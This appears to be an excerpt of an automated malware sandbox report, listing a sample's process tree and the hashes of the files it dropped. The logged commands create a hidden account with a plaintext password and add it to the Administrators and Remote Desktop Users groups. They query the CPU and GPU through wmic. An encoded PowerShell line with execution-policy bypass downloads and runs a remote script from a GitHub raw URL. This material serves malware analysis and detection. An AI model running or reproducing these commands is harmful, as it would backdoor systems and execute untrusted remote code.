-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:2056 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:1972 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:2372
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:4056 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:844 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD3⤵PID:2328
-
-
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵PID:3200
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵PID:2020
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:3600
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 39lXC91r1⤵PID:3788
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 39lXC91r2⤵PID:1512
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 39lXC91r1⤵PID:1336
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵PID:2196
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
PID:3036
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:4036
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵PID:3976
-
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:1972
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:356
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:2444
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
63151e4f7c3972f18a23c0e9996e14ef
SHA15d041fde6433a8ff8fc78a69fca1fd4630e3f270
SHA256cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3
SHA512f08c402f0a966cbe89fae0b5f9aa8536d6313dada788486a4db422a042769713a2896753acd47223348349b9960b5cde9470cc862668e2cdb90a6fcc1b87c8ec
-
MD5
63151e4f7c3972f18a23c0e9996e14ef
SHA15d041fde6433a8ff8fc78a69fca1fd4630e3f270
SHA256cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3
SHA512f08c402f0a966cbe89fae0b5f9aa8536d6313dada788486a4db422a042769713a2896753acd47223348349b9960b5cde9470cc862668e2cdb90a6fcc1b87c8ec
-
MD5
2c5bccd3dbf5eb92c804bf9485d82a4b
SHA10c268ed890eb9d891c7016cdb4167e3923dfb607
SHA25687cc665ced60d76960611e39b9b35080066e5fdfb6973fc9533d6fcb2d7819d4
SHA5124d1e9117cdca0afd4fa76609a2c23b170d0da0b2d02b613c1b67234c21491988e91486bfa108da0d7e87a038874d43c42ce289599a69ba5aa804eecb5cd1f8a8
-
MD5
2c5bccd3dbf5eb92c804bf9485d82a4b
SHA10c268ed890eb9d891c7016cdb4167e3923dfb607
SHA25687cc665ced60d76960611e39b9b35080066e5fdfb6973fc9533d6fcb2d7819d4
SHA5124d1e9117cdca0afd4fa76609a2c23b170d0da0b2d02b613c1b67234c21491988e91486bfa108da0d7e87a038874d43c42ce289599a69ba5aa804eecb5cd1f8a8
-
MD5
33ebe2ac7858b90b7459de2a20a814fd
SHA1699ad972023f0e8d1968e79564a57b0a7ba67e6b
SHA256e60965abc4e69cab7f0d634d61a5fe1d96375b7d43570a1f2a430cd73fbe11cc
SHA512fb853c0325f97ed8dbc2df0a42c503ef73b5dd9d959079b2c1489873f21aec89b032b0ac081126b72eac72b32b53e67181d7a99ed067c1c29018facbd7ec2df9
-
MD5
33ebe2ac7858b90b7459de2a20a814fd
SHA1699ad972023f0e8d1968e79564a57b0a7ba67e6b
SHA256e60965abc4e69cab7f0d634d61a5fe1d96375b7d43570a1f2a430cd73fbe11cc
SHA512fb853c0325f97ed8dbc2df0a42c503ef73b5dd9d959079b2c1489873f21aec89b032b0ac081126b72eac72b32b53e67181d7a99ed067c1c29018facbd7ec2df9
-
MD5
67f0d3d34dcf7aa43be0dfcc8cbad5db
SHA19839709b9ee50d668067f5036e7d86ddf1d0403e
SHA25668906cf93fed97db8cba61e7c40506dc87879e393a1e0d1c3279ccc44e3ea372
SHA5122fb5efce19f7a213931216ca1bdeef15c401636d8029158b155c74069287392704043569624b1b18425bf8e25db7c7bf06070c362794277a6525ae3a9534c03b
-
MD5
f783019c5dc4a5477d1ffd4f9f512979
SHA137c8d1e5dd2ebce647c4e0a92f8598ebf2fdcc7b
SHA2564c81fee866a87b2de6e10640fe094f0db29258014177e294ac94a819940f5348
SHA51264d90352f4466f0097dd2c7ace8ccb155947dda8ae148c8c6ba1507a9e879247fab2eba452c812ba628a65de93cc096dabfcb23d2be4b525a92e5ef9e4b57d6a
-
MD5
ee549c8bc01c44e2dd5a1fb7e0f1116a
SHA18656046d097207955cbfcb19b90d4d30fbc92628
SHA2566f0d3239b998c413187d82095c7f7cff8c8eca91bdd02e327332acdab134bc51
SHA51285fde475dfd3910bfd314208feadf7f7237a9b66fec1faae2c948b9837628f0a5a9c66efea0e17e86027d95ff36d049155d7aa8496bd7e71d942c387a8451e3b
-
MD5
28d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
MD5
dc55bdff5de718a2d1fccaf9d176c247
SHA154f13bfa1f3124d23ec93b09ab6e818080f98346
SHA25698f4453f1e35254d0e2b51ede4df018b384ede036e29c70b7e288ec412b39667
SHA512ee8d7c99f3921d93f28aa31471166f974d163cd9580af132cfb048bc59cb84398191eab98df6143e6fe660c3dcb3dbd91d6a59fe73a5ffccf81d50a3926562ad
-
MD5
9f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
MD5
ea3fd22a15b7692976040e490ddbcb48
SHA1bc9ea75f50206062fd88aa0984e74fee79bec2b9
SHA256463db3ff49eb32a9c947f0e1abbac21294d0c8cb47071404cb7a596918f02a4b
SHA512600608d0a9a9dec7dd3d36a6bf24a311cd641a90ccdaf099e59ac4ca27a172f267096e2987b2154880a45c5fe41809d67e14710e3445f84f3d1f10dca221d63d
-
MD5
ac13d804585a74dc542db4ec94da39df
SHA18642ae2e04e492700caf41b43de9ef9d8b3c26f9
SHA25684c41dc018689fcb2fc4240f1e0267a5ee82232e3bcd541f5f5bed4139cfcd55
SHA5120ba869487fda38d398903df4235bd8f2d0f8fb774b559125ba278751a5a503adbb0557f9ea2fde5fecba4f1a33b71583be36fac0f6f8842cbee0bdd7ea2fb5bf
-
MD5
9151c95451abb048a44f98d0afac8264
SHA122f447b210eb25c11be5a9c31f254f5f2bd50a78
SHA2568082bfe8a9f63854d6317cf6ddc0c18c54140ee5d179a96bfe9900c90d994518
SHA512728b140e68dcb6751cccb4d1046ac61f63e8db13d4f613b44e161d457f107acc11b3275167c7b4dff34a6d5966116ecb062f94713d0cf4f35b327d14ec7cbd13